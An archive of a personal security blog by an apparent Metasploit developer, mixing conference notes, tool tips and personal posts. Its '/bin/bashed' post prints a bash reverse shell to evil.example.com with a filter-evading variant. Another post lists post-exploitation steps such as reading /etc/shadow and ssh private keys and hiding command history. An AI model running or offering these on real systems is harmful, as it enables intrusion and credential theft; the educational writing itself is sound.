$ dd if=/dev/profanity

Blackhat DC

2010-01-21T12:21:00.000-08:00

Another Metasploit track is in the works, this time for Blackhat DC. I will be presenting on exploit automation using the Metasploit Framework. Hope to see you there.

Media Frenzy

2009-10-21T22:56:00.000-07:00

Some life-changing events going on over at the metasploit blog

Sliding Home

2009-08-08T23:06:00.000-07:00

As promised, my slides for Blackhat/Defcon 2009 have been placed in a web-accessible location: Using Guided Missiles in Drive-bys. Thanks everyone who showed up. To those who didn't, maybe I'll see you next time.

A Dark-colored Chapeau

2009-07-14T21:13:00.000-07:00

I'm making this post in the vain hope that someone cares about what security conference topics I find interesting. With that being said, Blackhat is going to be awesome this year, not least because of the Metasploit track. Without further ado, here are the talks I plan to attend.

Day One:
I'm presenting at 13:45 and, judging by my history, I probably won't be done with my slides until about 13:43, so I'm planning to miss all of the morning stuff.

15:15 Stefan Esser: State of the Art Post Exploitation in Hardened PHP Environments
This is a tough choice and I may end up flipping on it later. Valsmith and Colin's stuff is freaking awesome but I think Esser's work could end up being really useful for PHP meterpreter.

16:45 Valsmith, Ames, Kerb: Metaphish pt2.
I hope I can get into the room after the break.

Day Two:

10:00 Datagram: Lockpicking Forensics
Lockpicking is a terrifically fun hobby and I'd like to learn more about it.

11:15 Nick Harbour: Win at Reversing
I usually lose.

13:45 Danny Quist & Lorie Liebrock: Reverse Engineering by Crayon
Dr. Liebrock was a professor of mine and Danny is one of the best Reverse Engineers I've ever met. Can't miss this one.

15:15 Kostya Kortchinsky: Cloudburst - Hacking 3D and Breaking out of VMware
I'm not especially interested in VMware but Kostya Kortchinsky is an exploit machine. If I die half as good as Kostya is today, I'll be happy.

16:45 Vincenzo Iozzo & Charlie Miller: Post Exploitation Bliss - Loading Meterpreter on a Factory iPhone
Meterpreter is awesome and having the same post-exploitation toolkit available on multiple platforms is something I've wanted for a long time. The fact that these guys ported it to a tiny embedded device that frequently gets connected to tons of open wifi networks is an extra bonus.

VMWare keyboard issues

2009-05-14T21:39:00.000-07:00

I've been fighting with keyboard issues in VMWare since I started using Ubuntu. I'm not sure if the problems are specific to Ubuntu or if they were just introduced around the time I moved away from Gentoo, but either way, it's really annoying. First, VMWare would occasionally not recognize keys correctly in guests. The down arrow would become the windows key, shift would become ctrl, and alt, home, end, pgup, pgdn and the rest of the arrow keys would appear to quit functioning altogether. Outside of the guest, everything was fine. The fix for that was to tell VMWare to use the keymap provided by X instead of trying to figure it out. Open up ~/.vmware/config with your favorite editor (creating it if it doesn't exist) and add the following line:
xkeymap.noKeycodeMap = "TRUE"
Thanks to http://nthrbldyblg.blogspot.com/2008/06/vmware-and-fubar-keyboard-effect.html for this one.

Next, VMWare would occasionally cause all of the same keys from the previous bug either to stop working or to act as though they are permanently pressed in the host. After playing with this bug for awhile I found that it happens most reliably when coming out of full-screen mode. There's no real solution for this one, but running "setxkbmap" from a terminal fixes it. The vmware forums have a thread about this issue. Since I sometimes can't type when this bug strikes (e.g. when ctrl is stuck), I added a launcher to my gnome panel so that a single mouse click can give me my keyboard back.

Lastly, when using ctrl-g to have vmware grab input, it never releases the g key. I haven't found a fix for this (except to avoid using ctrl-g) and the only way I've found to get a working desktop back is to ssh in from another machine and killall vmware.

rubuntu

2008-12-07T12:20:00.000-08:00

The Ubuntu package ruby1.8 does not install an executable called ruby. It is expected that users install the package ruby which depends on ruby1.8 and installs a single file: a symlink called /usr/bin/ruby that points to /usr/bin/ruby1.8.

Metasploit 3.2 released

2008-11-19T21:02:00.000-08:00

Despite a number of delays and HDM's slave-driving schedule, The Metasploit Framework version 3.2 was officially released today. My main contributions include reliable bind, reverse, and findsock payloads for PHP script vulnerabilities and Browser Autopwn, a web client fingerprinting exploit machine.

I will post more about Browser Autopwn, including some step-by-step explanations of how I use it, in the coming days.

obj.grabAnkles();

2008-11-09T21:42:00.000-08:00

As far as I can tell, it is impossible to determine whether an ActiveX object created by classid actually works without just calling specific methods of that control and catching any exceptions. It doesn't seem to matter whether it was created with an <object> tag, or through javascript's document.createElement("object") or document.write("<object...>"). Internet Explorer turns anything with an id attribute into a property of document, and yet if you have


<object id="foo" classid="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" />

document.foo advertises no property or method that is not available from an object with no classid.

For those of you playing at home, yes this classid is one of the vulnerable ActiveX controls used in the MDAC / ie_createobject exploits. If the object actually got instantiated correctly and we can talk to it, typeof(document.foo.CreateObject) returns "unknown" rather than the "undefined" returned for properties that don't exist. So if we know a specific method that the ActiveX implements, we can check to make sure it worked using that. It is unfortunate, then, that there does not seem to be a standard method or property that all ActiveX objects must implement. Unless I'm missing something, because of the lack of a universal method or property, we cannot generically determine whether an ActiveX control created in this way was successfully instantiated. Thus, my "solution" for now is to save a method to test along with the classid. If this doesn't work, I just might give up on browser_autopwn's fingerprinting altogether and simply throw every single exploit at the client. And also maybe shoot myself. I really hate IE.

Tag, you're it

2008-10-30T22:41:00.000-07:00

When I started writing ruby I missed the convenience of a tags file for jumping around in vim to different parts of a project. After a bit of digging I found rtags to replace my beloved exuberant-ctags. Today I updated my metasploit trunk and, since it had been awhile since I had updated tags, I also ran rtags. Normally rtags is slow. Running it in the metasploit source tree typically takes several minutes. Today it seemed to hit infinite loops in multiple files, taking more than ten minutes on a single file before I killed it, added that file to the exclude list, ran it again and walked away for a while. After running into this a dozen times or so over the course of the day, I decided to switch tactics. As it turns out, exuberant-ctags has support for ruby, and probably has had it since before I started using rtags.


root framework3 # time ctags --exclude '.svn' \
--exclude=documentation/ --exclude=external/  \
--exclude=data --recurse .

real 0m0.742s
user 0m0.616s
sys 0m0.092s

*sigh*

Torontosploit

2008-10-21T15:51:00.000-07:00

While attending SecTor, I finally met HD Moore in person after having been a core developer for Metasploit for almost eight months. I had been introduced to him at Defcon a couple of years ago but we didn't actually talk so it doesn't count. Over beers, he asked me to co-present "Metasploit Prime," a discussion of new features available in the upcoming Metasploit 3.2-release. The release itself will be announced in the next few days. Slides(pdf) and video (wmv) for that presentation are now available. The video is actually just audio over the slides, which is somewhat disappointing. This is a gripe I've had with Blackhat for many years and Sector made the same mistake. Regardless of that little issue, Sector was a blast; I learned some stuff and had a great time in Toronto hanging out with HD, Jay Beale, Mark Fabro, and a bunch of other incredibly smart guys. SecTor is much smaller than Defcon (which is the only other security conference I've been to) and I really liked the tighter knit crowd -- it makes it much easier to meet people. It was considerably less technical but I enjoyed it nonetheless. At Defcon, I mostly just hung out with people I already knew because the crowds were so daunting while at Sector, it was easy to meet the rockstar presenters as well as lesser-known attending geniuses. Because of my experience at Sector, I will certainly look at smaller conferences in a new light.

100 UNIX commands to issue on other people's systems

2008-07-05T12:30:00.001-07:00

In response to Halvar Flake's request...

I'm not sure about 100, but there are a few that I use on any new system, mostly just basics that are useful on any multi-user environment: ifconfig -a, netstat -pan --inet, uname -a, w, id, mount, ps auxww.

These tell you a lot about the system and where you might go from there for further exploitation. ifconfig, like ipconfig on Windows, can tell you if the system has a NIC on another network and netstat can tell you if it's talking to one. It's important to note that options to netstat vary from one OS to another -- the above options will list all AF_INET sockets along with associated process IDs on Linux without doing DNS lookups. On Solaris and AIX it is not possible to see PIDs and the command to list all AF_INET sockets without doing DNS lookups is netstat -an -finet. uname tells you the OS name and kernel version. w (or its cousin who) will let you know if someone might be watching. id is whoami on steroids; it gives uid, gid, and a list of groups you belong to. mount tells you how the system's storage is layed out and whether there are any removable drives attached at the moment. ps lists processes and the argument tells it to list all of them, including arguments, with the owner's username. If you're lucky, sometimes you see things like this:


root     21810  0.0  0.4   6984  2452 pts/10   S+   21:13   0:00 mysql -uroot -ppassword

Then we come to interesting files. Obviously /etc/passwd and /etc/shadow are of interest. But so are slightly more obscure things like /home/*/.ssh/id_rsa (private keys) and /tmp/ssh-*/* (ssh-agent auth sockets). I mentioned some abuses of these files about a year and a half ago. I suggest a viewing of HD Moore and Valsmith's Blackhat 2007 talk, Tactical Exploitation for some more fun things to do with ssh and kerberos.

Finding interesting files can sometimes be a problem, so we have find to help us out. For instance, if you want to list all of the binaries you have permission to read with the setuid bit set: find / -perm +0400 2>/dev/null. All files with password or passwd in their name: find / -iname '*passwd*' -or -iname '*password*'.

If you worry about leaving commands in a history file, you'll probably want to unset HISTFILE. On the other hand, sometimes the history helps an attacker, too. In bash the command history lists all of the commands in the history file. So history | grep -A1 '^ssh' and history | grep -A1 '^su' can often yield passwords when the user whose account you've compromised doesn't pay attention to make sure the password prompt actually came up before typing.

A few more commands that are really cool but are less likely to be installed include: lsof and screen.

Minimal indeed

2008-03-11T20:22:00.000-07:00

Mingw, or Minimal GNU for Windows, is a really cool project. The idea is to have a gcc that will run anywhere gcc will run and can make Windows executables. It does this well, giving programmers the ability to link native Windows libraries in a non-windows environment. It differs from the standard gcc in a significant way that I discovered this evening: order of arguments is quite important. Whereas standard gcc will accept "gcc code_that_uses_math_dot_h.c -lm" and "gcc -lm code_that_uses_math_dot_h.c" as meaning exactly the same thing, mingw32-gcc is not so forgiving.


egypt@bastet ~ $ cat mintest.c 
#if defined( _WIN32 )
 #include <winsock2.h>
#else
 typedef int SOCKET;
 #include <arpa/inet.h>
#endif
#include <stdio.h>
#include <string.h>

#define PORT 1234

int main () { 
        struct sockaddr_in saddr;
        SOCKET s;
        SOCKET client;
#if defined( _WIN32 )
        WSADATA w;
        WSAStartup(0x101, &w);
#endif
        printf("Hello world\n");
#if defined( _WIN32 )
        WSACleanup();
#endif
        return 0;
}
egypt@bastet ~ $ mingw32-gcc -lws2_32 mintest.c -o mintest.exe 
/tmp/cc7dCAKg.o:mintest.c:(.text+0x29): undefined reference to `_WSAStartup@8'
/tmp/cc7dCAKg.o:mintest.c:(.text+0x41): undefined reference to `_WSACleanup@0'
collect2: ld returned 1 exit status
egypt@bastet ~ (1) $ ls -l mintest.exe
ls: cannot access mintest.exe: No such file or directory
egypt@bastet ~ $ mingw32-gcc mintest.c -lws2_32 -o mintest.exe
egypt@bastet ~ $ ls -l mintest.exe
-rwxr-xr-x 1 egypt egypt 13K Mar 11 21:50 mintest.exe*
egypt@bastet ~ $ file mintest.exe
mintest.exe: MS-DOS executable PE  for MS Windows (console) Intel 80386 32-bit
egypt@bastet ~ $

The moral of the story is this: if you're having trouble getting mingw to properly link a library, put the .c as your first argument.

/me grumbles

/bin/bashed

2008-01-29T20:59:00.000-08:00

Bash can read and write pipes on a specific file descriptor, like so:``echo foo >&2'' which prints to file descriptor 2 and ``cat <&2'' which reads from file descriptor 2. Just like in the rest of the unix world, file descriptor 0 is stdin, 1 is stdout, and 2 is stderr unless they've been redirected. In fact, we're not limited to 0, 1, and 2 -- we have up to 1023 to play with. To open a new one, we use the syntax: ``cat 3<>foo.txt <&3'' which has the same effect as ``cat foo.txt'', but piped through file descriptor 3.

Bash also has a little known feature that allows opening a tcp connection with the special filename: /dev/tcp/hostname/port. ``echo foo > /dev/tcp/example.com/9999'' will perform a DNS lookup for example.com, attempt to connect to TCP port 9999 of the resulting IP address, and send the string "foo" to the socket.

Putting these things together...

targetbox / $ /bin/bash 3<>/dev/tcp/evil.example.com/9999 <&3 >&3 &

and we've got a shell shoveler in pure bash, no outside executables. Catch it with:

evil / $ nc -l -p 9999

Same thing; pure bash, now with no spaces for getting around input filters:
eval${IFS}"bash${IFS:0:1}3<>/dev/tcp/evil.example.com/9999${IFS:0:1}<&3${IFS:0:1}>&3${IFS:0:1}&"

base64-encrypt()

2008-01-28T21:47:00.000-08:00

http://www.kb.cert.org/vuls/id/180876

Base64 encoding is just that: encoding. It's a way to ensure that text with strange characters can be sent on the wire in an unambiguous, portable manner. It is not, and was never meant to be, encryption. There is no added security by encoding a password with base64. Just like there is no added security by encoding a password with rot13. It is no more than obfuscation; perhaps less than obfuscation since base64 on the wire sticks out and says, "Hey, look at me!" Taking an authentication mechanism that is secured by real encryption and sending it back out in plaintext (or, equivalently, encoded with base64) is ridiculous.

So don't ever do that.

The Perfect Phone

2007-10-16T22:54:00.000-07:00

There's been a lot of hype lately about the iPhone. It looks snazzy. It has Wifi, EDGE, Bluetooth, and all the other bells and whistles a high-end phone is expected to have these days. But it's not the phone for me. Before the iPhone were several Nokia offerings that are almost up to my standards. The Treo and the Blackberry look like the same story: almost what I want but not quite.

What I want in a phone are these features:

Wifi -- preferably with a chipset that allows me to run kismet. Better yet would be one that allows me to run Lorcon and/or livetap.
Large amounts of flash storage. I'd prefer this to be internal but I don't care what the medium is. I'll buy extra storage media without complaining too much. With as cheap as USB flash devices are getting these days, it should be a gigabyte at minimum.
charge over usb
a camera would be cool but not strictly necessary. I used to think that I would prefer a phone with no camera because some places won't allow cameras. I've recently come to realize that most places that don't allow cameras also don't allow phones.
Bluetooth for the sole purpose of connecting to a laptop and using the phone as a bridge.
a browser that handles javascript and flash decently. I know this isn't as big a problem as it used to be, but the five-lines-of-text-at-a-time that my old Samsung presented as "Internet" just doesn't cut it.
a big enough screen to display many lines of text.
Unix-like operating system. This is necessary to be able to have a useful shell.
a good way to input text. This is necessary to be able to interact with that shell.
Bash or the equivalent. I can do everything on the commandline faster and more efficiently.
an ssh client. What's the point of being connected 24/7 if i can't be connected to the machines that do my bidding? This also gets me to irc and other various programs that have become tethered to my brain over the last several years.
nmap -- this also means I need raw packets.
a ruby interpreter.
other third party applications (some of which will undoubtedly be written by me).

And I want it all without having to go through the pain and discomfort of JailBreak and other forms of warranty-voiding DMCA-violating kludges.

Basically, I want my Thinkpad in a 4.5 x 2.5 x 0.5 inch, 5 ounce package that can make calls.

The FIC Neo1973 looks very promising on the software front. The entire phone is open; it's based on Linux and everything from the circuit boards to the kernel to the frontend is user modifiable. That has strong appeal. Unfortunately, it has no Wifi which makes it nearly useless to me. The second generation, which does have wifi, is advertised as being available early 2008 but since it was advertised as being available on October 1 earlier this year, I'm not holding my breath.

The iPhone has nice hardware and a nice interface. But for it to be useful requires breaking laws. I boycott products that have that property in the hopes that manufacturers will start making things open enough to be useful for more than their own highly-defined and highly-limited idea of useful.

The Nokia N800 looks like everything I want -- Linux-based; wifi; third party development is encouraged; hell, Immunity built a pentesting tool out of them -- but it's not a phone. Maybe I'll just get one of these and keep my crappy free-with-service-agreement 6103. I would be much more interested in the Nokia E90 if it ran Linux. I just can't justify a thousand dollars for a phone without being sure beforehand that I'll like it.

Ephemeral: adj. lasting for only a short period.

2007-06-11T20:14:00.000-07:00

Mosref (MOsquito Remote Execution Framework) is what Metasploit's Meterpreter really wants to be. It is (on paper) a platform-agnostic virtual machine and Lisp interpreter with strong encryption on top of multiple communication channels. In reality, I could never get it to compile; nor could many other people based on the conversation in the mosref mailing list. And even if I could have, I would have had to learn the Mosquito dialect of Lisp for it to be any kind of useful.

After Wes Brown's and Scott Dunlop's talk about it at Defcon 14, I really wanted to see Mosquito succeed. Unfortunately, it never had any updates after that talk (the last developer cvs transaction according to source forge was the initial commit). The mailing list contained almost no discussion of development. This afternoon I visited ephemeralsecurity.com only to discover that the domain is now parked by an advertiser and whois lists the owner as "Domain Discreet". I was disappointed to learn this but not surprised.

Oh, well. If you want a platform-independent in-memory rootkit, you'll just have to write it yourself.

Turnabout

2007-01-23T07:43:00.000-08:00

My home firewall runs an ssh server. Every few days, I go through my logs and find that someone has been attempting to guess account names and passwords on that server. For a while, I just allowed it to continue because I found it interesting to see what usernames were being guessed. After a few months of getting guess attempts every couple of seconds with almost no interruptions from dozens of ip addresses, I decided I didn't want to take the risk of somebody actually getting in and set up iptables rules to blackhole any ip address that sent more than ten SYN packets to ssh in less than two minutes. A friend pointed me to denyhosts, a tool to watch your logs for failed ssh attempts and put the offending host into your /etc/hosts.deny for a certain period of time. This is effectively the same as the iptables rules. Both of these methods are very effective but not as interesting as seeing all the usernames tried. So I downloaded the source for openssh-4.4p1 and made a few modifications. My new sshd:

Logs all connections
Logs usernames and passwords
Never opens a shell no matter what

If you'd like to set this up yourself, you can download the complete source, or if you already have the source for openssh-4.4p1, and don't want to download the whole thing just for a few modifications you can get just the diff. Then run the following commands:


tar xzvf openssh-logger.tar.gz
cd openssh-logger
./configure --prefix /usr/honey/ \
  --with-privsep-path=/usr/honey/chroot \
  --with-pid-dir=/usr/honey/var/run
make

The purpose of putting it in a strange directory is that we don't want to hose your real ssh server. If that went well, run:


su
make install
touch /usr/honey/chroot/sshattacks.log
chown sshd:sshd /usr/honey/chroot/sshattacks.log

Remember: if you run a real ssh server, you'll want to change the port it listens on in your /etc/ssh/sshd_config. You can add section to your ~/.ssh/config like this:


Host <hostname>
  Port <real server's port>

so your client will connect to the correct server. Now everything should be set up and you should start seeing brute force attacks in /usr/honey/chroot/sshattacks.log in no more than a couple of days.

Output will look something like this:


host: 10.0.0.100 port: 45677
user: root pass: root
user: root pass: t00r
user: root pass: r00t

Happy hunting!

Nastier tricks with ssh

2007-01-15T20:32:00.000-08:00

In my daily blog reading a week or so ago, I stumbled on Jon Hart's blog. In it, he notes the facts that root can read any file whatsoever on a *nix system and that ssh agent forwarding is accomplished using unix sockets. The corollary to this is that root (or someone with access to your account) can steal your password-protected ssh keys after you decrypt them.

Having used key-based authentication on a regular basis myself, this got me to thinking about other possibilities for an unrestricted user. As it turns out, if a user can read someone else's private key file, one can authenticate with it. Long story short, I've modified Jon's code to also search out non-password-protected keyfiles and attempt to abuse them.

On ssh and timeouts

2007-01-12T18:27:00.000-08:00

It turns out that ssh by default doesn't like to stay connected forever. If you setup a port forward as described below and don't connect to it right away one end or the other will timeout (not sure which, but it doesn't really matter). To circumvent this issue, I've taken to setting up the forward, connecting to the remote box, then connecting through the port forward in a screen session, and detaching screen (or not, depending on my mood). Now ssh won't be able to tell that there's no interaction and will stay connected indefinitely.

Incidentally, if you love the power of the command line and haven't heard of screen, you should install it at the earliest opportunity. Thank me later.

Tricks with SSH

2006-12-17T12:48:00.000-08:00

Do you want to ssh to your NATed box at home? Want to connect in to your machine at work that drops SYN packets at the perimeter? Tired of having to live without tab-completion and other handy features when an exploit sends a shell back to netcat? SSH to the rescue.

First, from the firewalled machine (call it BoxA) run:
ssh -nNT -R 2222:localhost:22 user@boxb.example.com &
then on BoxB.example.com:
ssh user@localhost -p2222

So what exactly does this do? Let's take a look at the relevant sections from ``man ssh'':


-n Redirects stdin from /dev/null (actually, prevents reading from stdin).  This must be used when ssh is run in the background.

-N Do not execute a remote command.  This is useful for just forwarding ports (protocol version 2 only).

-T Disable pseudo-tty allocation.

-R [bind_address:]port:host:hostport
Specifies that the given port on the remote (server) host is to be forwarded to the given host and port on the local side.  This works by allocating a socket to listen to port on the remote side, and whenever a connection is made to this port, the connection is forwarded over the secure channel, and a connection is made to host port hostport from the local machine.
...
By default, the listening socket on the server will be bound to the loopback interface only.  This may be overriden by specifying a bind_address.

``-nNT'' means we aren't going to give ssh any input, so don't execute a shell and don't allocate a tty. -R is a little trickier; it says start forwarding port 2222 of the remote machine (BoxB) to port 22 of the machine you're running ssh from (BoxA). Now when you run ssh localhost -p2222, you're connecting to the port forward that you just set up which sends your connection through an encrypted tunnel to BoxA, bypassing the firewall rules because the tunnel is already connected.

Caveats:

You're connecting to localhost from BoxB but the traffic is actually going to BoxA. This will confuse ssh who thinks that localhost should have the same fingerprint each time. To get around this, you'll likely have to delete the line beginning with ``localhost'' in your ~/.ssh/known_hosts.

If you're using an exploit you'll have to know the account's password (or steal an ssh key)

Don't complain to me if your sysadmin gets mad and blocks outbound ssh. =)

I love open source. They've really thought of everything.

Securosis and Daringflamebait

2006-11-21T20:50:00.000-08:00

I'm constantly updating my daily blog list and today I stumbled on securosis.com. He's got decent advice for the less technically savvy (which happens to mirror a lot of what I've been telling the uninitiated for a while now). He also explained to John Gruber that the so-called challenge he proposed to Ellch and Maynor was asinine in a far more even tone than I might have.

Plus this great quote:

Give honest answers to honest questions, and when someone asks for the ROI of a firewall ask them for the ROI on their desk.

Keyboard Dancing

2006-11-08T18:56:00.000-08:00

Keyloggers are cool. Hardware keyloggers are cooler because they are undetectable to the operating system. A mark against hardware gizmos is that for them to be useful, one must install the gizmo and then retrieve it. Until now. Now it doesn't have to be retreived. Now all one has to do is drop the gizmo and watch for traffic on the internet. Or own a keyboard manufacturing company.

Vikings are not magical

2006-10-15T22:51:00.000-07:00

I've been resisting the new Lego sets for a while now because of their futuristic depictions of supposedly historical eras. For example, the Knights' Kingdom II and Vikings series both have giant spring-loaded projectile weapons. Well today I broke down and bought a vikings set. I'm still uncertain about the ridiculous giant catapult powered by a lone viking. Launching boulders at least three times as big as himself doesn't seem within the realm of possibility for an 8th-11th century warrior, even if he is a badass. On the other hand, the armor, weapons, and non-specialty bricks are awesome.

On a completely unrelated note, Willyk set me up with a new gallery account today. Check it out if you're interested.

Update 2006-11-05: the gallery url has changed and now works. =)

Siren's call

2006-09-03T21:17:00.000-07:00

In the last few weeks, we've rented a number of movies. So I will succumb to the Internet's siren-like call to publish my opinion so that all who care to read it might find something with which they disagree. In alphabetical order:

Blood Rayne - Vampires. We gave it the MST3K treatment and got our two bucks worth.

The Ice Harvest - My executive summary: "John Cusack and Billybob Thornton steal some money. People die. There are breasts." Might be a decent movie iff you like film noir.

Kiss Kiss Bang Bang - A good detective film with assorted twists. I was on the edge of my seat for much of this movie and laughing the rest of the time (Val Kilmer's character is called "Gay Perry"). Great movie with a solid cast, entertaining plot and funny dialogue. Highly recommended.

RV - This was billed as a slightly ridiculous comedy and it definitely lives up to that description. But it's not retarded like, say, anything Will Ferrell has ever done.

Unleashed - From the cover and the back-of-the-case description, this is your standard martial arts movie. Do not let that fool you; in addition to his incredible physical abilities, Jet Li is quite an actor and Unleashed is a phenomenal movie.

Defcon 0x0E

2006-08-09T21:46:00.000-07:00

Defcon was a blast. I met a bunch of cool people and got to hang out with some old friends. fednaught, a Capture the Flag team, got second place despite my help.

My favorite talks were Hacking Malware: Offence is the New Defence by Danny Quist and Valsmith and Exploit Writing Using Injectable Virtual Machines by Wes Brown and another fellow from the same organization. The latter because James and I were discussing what we would need in order to be prepared for next year's CtF only moments before going into this presentation and hearing that it had already been written.

Highly Sceintific Random Internet Tests

2006-07-24T13:31:00.000-07:00

Apparently I'm in the 93rd percentile for nerdiness based on this Highly Scientific Random Internet Test. This is a dubious honor but one that I felt was worth sharing.

Hello, I must be going

2006-07-07T11:03:00.000-07:00

We've been in Idaho Falls for about three weeks now. My job is interesting and I'm enjoying my work. I haven't learned all the ropes yet; I just figured out how to fill in time cards yesterday. We're just about settled into our new house but there are still a bunch of boxes that haven't been unpacked. And now I'm going on travel for two weeks. That's not really a bad thing; it will be fun and interesting and I will probably learn a ton on my first outing. But there are a lot of things I need to do here in Idaho Falls. Mostly paperwork things but important things nonetheless, like finding out where my paycheck goes and making sure it gets deposited before our first month's bills come due.

Hurray for IBM

2006-06-06T16:09:00.000-07:00

I bought a refurbished Thinkpad T40 in March with a 90-day manufacturer's warranty. After having it for about two months, the USB ports died and the video card started flaking out everytime I pressed the machine in the wrong spot. This was about the time when finals were approching fast and I could not live without my laptop, so I sucked it up and decided I would just pay to get it fixed out of warranty after the end of the semester. This afternoon I found the invoice and called IBM. It turns out that in IBM-land a 90-day warranty that started in March expires in October so they are going fix it for free.

Additionally, in the past I have told Dell customer support representatives that the machine I'm calling about does not have Windows installed. Their response has pretty much universally been, "Then it's your problem, not ours." I told the IBM tech support guy the same thing and he said, "We don't care about that."

Hurray for IBM!

Mmm... Socorro...

2006-06-05T19:29:00.000-07:00

The closer I get to moving, the more I wish it wasn't so near.

I've been in Socorro for just shy of six years, now. For the first 4, I didn't care at all about the town. But in the last two years, I've made some really great friends and I've come to enjoy many elements of Socorro and New Mexico Tech. I think a lot of it is the college-town aspect of this place. I enjoy walking around campus in the middle of the night for no particular reason and running into a bunch of other caffeinated people doing the same thing. I find it hilarious when I'm talking to a towny and they ask if I "go to the tech". I like writing code at El Camino til 4 in the morning. I like having conversations with random people I've never seen before who laugh at my stupid jokes about big-O notation.

I'll miss you guys. And El Camino's green chile cheese fries.

New to blogging.

2006-05-07T19:56:00.000-07:00

Not really new to blogging... but new to automated blogging. My previous blog management software was vim. Don't get me wrong, vim rocks. But every time I made a post, which happend quite infrequently because it was a pain in the ass, I thought, "Man, I should really write some code to automate this process."

In the fine CS tradition of not reinventing the wheel I decided to use someone else's code instead. As an added bonus, I'm using someone else's server and someone else's bandwidth as well. =)

Repost of my ramblings which spurred me to get a blogger account:

I'm about to graduate a week from today so 'the real world', as it is often called, has been on my mind a lot recently. It really bugs me when I tell people I'm going to graduate and they say something like: "Well I guess you'll soon find out how much the real world sucks. Have to get up earlier and work longer."

I did some math. I'm studying, working at my student job, doing homework or sitting in class for 60-70 hours per week. That 40 hour/week job with no homework everyone complains about so much sounds pretty sweet.

I think the 'real world' that you're talking about does suck. I wouldn't want to do something meaningless everyday for eight hours. But a large percentage of my friends and acquantainces who don't have a degree seem to think that college is a breeze and that we just screw around for 4 years (well, 6 for me) until we get a job like theirs that we hate like they do.

So in conclusion, no, college is not like the 'real world'. But in two month's time, I'm going to be working with some of the best hackers in the world securing some of the country's most important assets. I'm not sure if that's the real world, either...